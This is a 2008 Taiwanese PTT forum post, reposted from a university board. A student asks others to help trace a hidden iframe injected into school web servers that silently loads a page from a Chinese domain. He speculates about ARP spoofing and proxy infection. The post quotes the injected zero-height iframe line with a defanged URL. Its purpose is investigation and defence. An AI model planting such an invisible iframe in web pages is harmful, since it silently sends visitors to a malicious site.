※ [本文轉錄自 MUSTMIS 看板] 作者: yck0210 (我的心不再流浪) 看板: MUSTMIS 標題: [問題] 中毒？木馬？請大家幫忙找看看 時間: Wed Oct 22 19:59:40 2008 在我們系上網最近會發現學校許多Server都被掛上大陸網站隱藏語法.... 我先聲明，我不站在哪個單位，也不喜歡把技術問題給政治化！ 我只是想找到問題，知道問題的根源，最重要的是讓大家有一個安全無虞的網路環境～ 所以，如果大家也發現跟我一樣有下列的問題，請回應給我！ 告訴我您在哪上網的？您是瀏覽哪一個網頁才發現的？ 最近學校有些網站會隱藏一些會導入病毒網站的語法.... 這個語法會導致看這網頁的同時也導入到這大陸網站！ 至於下載什麼東西我們還不清楚，防毒軟體掃瞄本機也沒有病毒～ 但是有些網站會看不到內容，狀況畫面如下列二張圖片.... http://img80.imageshack.us/my.php?image=gggggttt1lf5.jpg http://img89.imageshack.us/my.php?image=gggggttt2kf2.jpg 在這些疑似被入侵的網站內，打開網頁的原始碼的第一行會出現下列語法.... <iframe src=http ://gggggttt.cn/1/zz.htm width=100 height=0></iframe> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ => 網站故意加空格，怕有人誤連！ 進這些網站沒什麼問題，但有的網頁就會打不開，用防毒軟體掃也掃不到！ 今天我在網路上survey這個問題，發現台灣地區好像沒人反應，都是大陸在討論～ 我整理了一下，發現它的特性，好像是一種ARP攻擊，會造成整個區域網路都中獎！ Norton 網站所公告關於 gggggttt.cn 的說明 http://safeweb.norton.com/report/show?name=gggggttt.cn 原本我的想法如下列所述.... 很多人都知道這個問題，都掃毒了也沒發現病毒，計中說網頁也沒被竄改！ 在學校上網只要是連80 port會經過proxy server， 也就是一般http網頁都會經過代理伺服器～ 如果從校外連進學校就不會經過proxy server，也很正常，所以我懷疑是proxy中毒！ 可是有趣的是，只有特定網站才會有這個現象，有的網站就不會有～ 網路上有討論說Client端跟Server端都沒問題，病毒是存在Server的記憶體裡， 所以Server重開機就不會有這問題！ 但是問題還是沒解決，它有可能藏在SQL Server裡面，一被執行又發作了～ 計中說是我們資工系都中毒才會這樣，這句話讓我們系上的老師都很不爽！ 我曾經想過會不會是路由器被攻擊，不過路由器只處理到網路的第三層， 所以應該是不太可能～ 系上太多電腦了，我光測我的實驗室就快吐了，有的電腦有這現象，有的沒有.... 所以，結論是，有看到這篇文章的朋友們幫我測一下，任何校內或校外的網頁都可以！ 看看會不會有這問題，在原始碼內的第一行會不會有那一行語法？ 如果有請告訴我，告訴我您在哪上網，看哪一個網頁？ 謝謝大家的幫忙！ --

※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 210.240.221.175 --

※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 211.74.172.225